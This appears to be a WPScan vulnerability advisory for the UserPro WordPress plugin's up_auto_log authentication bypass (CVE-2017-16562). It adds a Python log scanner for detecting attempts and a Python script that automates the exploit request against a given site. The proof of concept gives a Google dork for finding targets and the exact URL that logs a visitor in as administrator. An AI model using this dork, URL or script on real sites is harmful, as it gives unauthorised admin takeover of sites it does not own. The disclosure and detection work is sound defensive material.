UserPro <= 4.9.17 - Authentication Bypass


Description
The UserPro plugin's up_auto_log request parameter logs the requester in as the user whose username is 'admin' without any credentials being checked, bypassing the WordPress login entirely. Any unauthenticated visitor can send the parameter. If the site has no user named 'admin' it is not affected; otherwise the fix is to update the plugin to 4.9.17.1.
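On the defensive side of the description above, the following is an added example (not part of the WPScan advisory, the Wordfence submission, or the UserPro plugin) that scans web server access logs for requests carrying the up_auto_log parameter and reports which source addresses went on to reach wp-admin. It assumes the Apache/nginx "combined" log format and that lines appear in the order the server wrote them; the log lines it contains are constructed for the example.

```python
"""Detection for the up_auto_log bypass: scan combined-format access logs
for requests that carry the parameter.

Added example, not part of the WPScan advisory or of the UserPro plugin.
Assumes the Apache/nginx "combined" log format and that lines appear in the
order the server wrote them. The log lines below are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# combined format: ip ident user [time] "method target proto" status size "referer" "ua"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample: one attempt followed by a dashboard request, one attempt
# with no follow-up, a referer-only occurrence, and one unparsable line.
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Nov/2017:14:02:11 +0000] "GET /?up_auto_log=true HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Nov/2017:14:02:15 +0000] "GET /wp-login.php HTTP/1.1" 200 2310 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [10/Nov/2017:14:02:19 +0000] "GET /wp-admin/ HTTP/1.1" 200 8901 "http://example.org/?up_auto_log=true" "Mozilla/5.0"',
    'this line is not in combined format',
    '192.0.2.44 - - [10/Nov/2017:14:05:00 +0000] "GET /blog/?up_auto_log=true&x=1 HTTP/1.1" 302 0 "-" "curl/7.55.0"',
]


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def up_auto_log_value(target):
    """Value of up_auto_log in the request target's query string, or None.

    Only the query string is inspected: the parameter appearing in a Referer
    header (third sample line) is not an attempt by itself.
    """
    values = parse_qs(urlsplit(target).query, keep_blank_values=True).get("up_auto_log")
    return values[0] if values else None


def find_bypass_attempts(lines):
    """Every parsed request whose target carries up_auto_log, with its status code."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        value = up_auto_log_value(rec["target"])
        if value is not None:
            hits.append({"ip": rec["ip"], "ts": rec["ts"], "target": rec["target"],
                         "status": int(rec["status"]), "value": value})
    return hits


def attempts_followed_by_admin(lines):
    """Source IPs that sent up_auto_log and afterwards requested /wp-admin.

    A successful bypass is normally followed by a dashboard request from the
    same address, so this narrows the hits to likely successes.
    """
    attempted, confirmed = set(), []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if up_auto_log_value(rec["target"]) is not None:
            attempted.add(rec["ip"])
        elif (rec["ip"] in attempted
              and "/wp-admin" in urlsplit(rec["target"]).path
              and rec["ip"] not in confirmed):
            confirmed.append(rec["ip"])
    return confirmed


if __name__ == "__main__":
    for hit in find_bypass_attempts(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} {hit["target"]} -> {hit["status"]}')
    print("followed by wp-admin access:", attempts_followed_by_admin(SAMPLE_LOG))
```

Matching on the parameter name rather than on the value `true` is deliberate: a defender wants every probe, whatever value was sent, and the status code plus a later wp-admin request from the same address is what separates a probe against a patched site from a likely compromise.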
Proof of Concept
1 - Google Dork inurl:/plugins/userpro

2 - Browse to a site that has the userpro plugin installed.

3 - Append ?up_auto_log=true to the target: http://www.targetsite.com/?up_auto_log=true

4 - If the site has a default 'admin' user you will now see the WordPress admin bar (the wp menu) at the top of the site. You are now logged in with full administrator access.
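The four manual steps above as a scripted check. This is an added example, not code from the WPScan page, the Wordfence submitters, or the UserPro plugin. It sends the step-3 request with an empty cookie jar and reports the two login signals step 4 describes: a wordpress_logged_in_* cookie being set, or the admin bar appearing in the page. The cookie prefix and the wpadminbar element id are standard WordPress behaviour; the User-Agent string and the script name are arbitrary choices.

```python
"""Scripted version of the four proof-of-concept steps above.

Added example; not code from the WPScan page, the Wordfence submitters, or
the UserPro plugin. It requests /?up_auto_log=true with an empty cookie jar
and reports the login signals step 4 describes. The cookie prefix and the
admin bar element id are standard WordPress behaviour; the User-Agent string
is an arbitrary choice.
"""
import re
import sys
import urllib.error
import urllib.request
from http.cookiejar import CookieJar

# WordPress names its authenticated-session cookie wordpress_logged_in_<hash>,
# where the hash is derived from the site URL, so match on the prefix only.
LOGIN_COOKIE_PREFIX = "wordpress_logged_in_"

# The admin bar ("wp menu at the top of the site" in step 4) is rendered as
# <div id="wpadminbar"> for logged-in users.
ADMIN_BAR_RE = re.compile(r'id=["\']wpadminbar["\']', re.IGNORECASE)


def assess(cookie_names, body):
    """Judge a response to /?up_auto_log=true.

    cookie_names: names of the cookies the server set during the request
    body: response body as text
    Returns (bypassed, evidence).
    """
    for name in cookie_names:
        if name.startswith(LOGIN_COOKIE_PREFIX):
            return True, "login cookie set: " + name
    if ADMIN_BAR_RE.search(body):
        return True, "admin bar (#wpadminbar) rendered in the response"
    return False, "no login cookie set and no admin bar rendered"


def probe(base_url, timeout=15):
    """Send the step-3 request and assess the result.

    A fresh CookieJar is used so that a cookie left over from an earlier
    legitimate login cannot make a patched site look vulnerable. The jar also
    captures cookies set on an intermediate redirect, which resp.headers
    would not show.
    """
    url = base_url.rstrip("/") + "/?up_auto_log=true"
    jar = CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    req = urllib.request.Request(url, headers={"User-Agent": "up_auto_log-check/1.0"})
    try:
        with opener.open(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as err:
        # A 4xx/5xx page can still carry the login cookie; keep its body too.
        body = err.read().decode("utf-8", errors="replace")
    return assess([c.name for c in jar], body)


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: python up_auto_log_check.py http://www.targetsite.com")
    bypassed, evidence = probe(sys.argv[1])
    print(("VULNERABLE: " if bypassed else "not bypassed: ") + evidence)
```

The cookie check is the stronger signal: a theme can hide the admin bar, but a patched 4.9.17.1 site will not set a wordpress_logged_in_ cookie for an unauthenticated request. A site without a user named 'admin' will also report "not bypassed" even on a vulnerable version, matching the description above.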

Affects Plugin

Fixed in version 4.9.17.1

References

CVE 2017-16562
EXPLOITDB 43117
URL https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9

Classification

Type AUTHBYPASS
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-287

Miscellaneous

Submitter Colette Chamberland, Iain Hadgraft
Submitter Website https://wordfence.com
Submitter Twitter @cjchamberland
Verified No
WPVDB ID 8950

Timeline

Publicly Published 2017-11-10
Added 2017-11-12
Last Updated 2017-11-12

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.